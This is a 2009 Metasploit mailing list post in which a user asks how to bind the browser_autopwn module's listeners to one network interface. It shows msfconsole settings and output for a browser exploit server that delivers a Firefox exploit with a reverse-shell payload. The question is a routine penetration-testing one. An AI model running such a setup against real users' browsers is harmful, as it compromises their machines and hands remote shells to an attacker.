Metasploit mailing list archives
Specify interface with browser_autopwn?
From: bcg at struxural.com (Ben Greenfield)
Date: Mon, 10 Aug 2009 10:05:52 -0400
Is there a way to specify which interface browser_autopwn will use? I'd like to have the listeners spawn on a specific interface, but it seems like its behavior is to spawn on the interface with the default gateway. Does it listen on all interfaces? I may be using it incorrectly as well, but I've tried a few combinations of LHOST/SRVHOST to try to get the LOCAL IP once it's running to read as what I'm expecting. Here's an example of what I mean:
set LHOST 10.254.254.1
LHOST => 10.254.254.1
set SRVHOST 10.254.254.1
SRVHOST => 10.254.254.1
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module running as background job msf auxiliary(browser_autopwn) > [*] Starting exploit modules on host 10.254.254.1... [*] --- [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:80/GqXTRJbF5EX4hY [*] Local IP: http://67.***.**.**:80/GqXTRJbF5EX4hY [*] Server started. If I want this to spawn on 10.254.254.1, doesn't the LOCAL IP also need to be that same address? Maybe I missed an option or a way to specify interface? Thanks,
Current thread:
- Specify interface with browser_autopwn? Ben Greenfield (Aug 10)
- Specify interface with browser_autopwn? egypt at metasploit.com (Aug 10)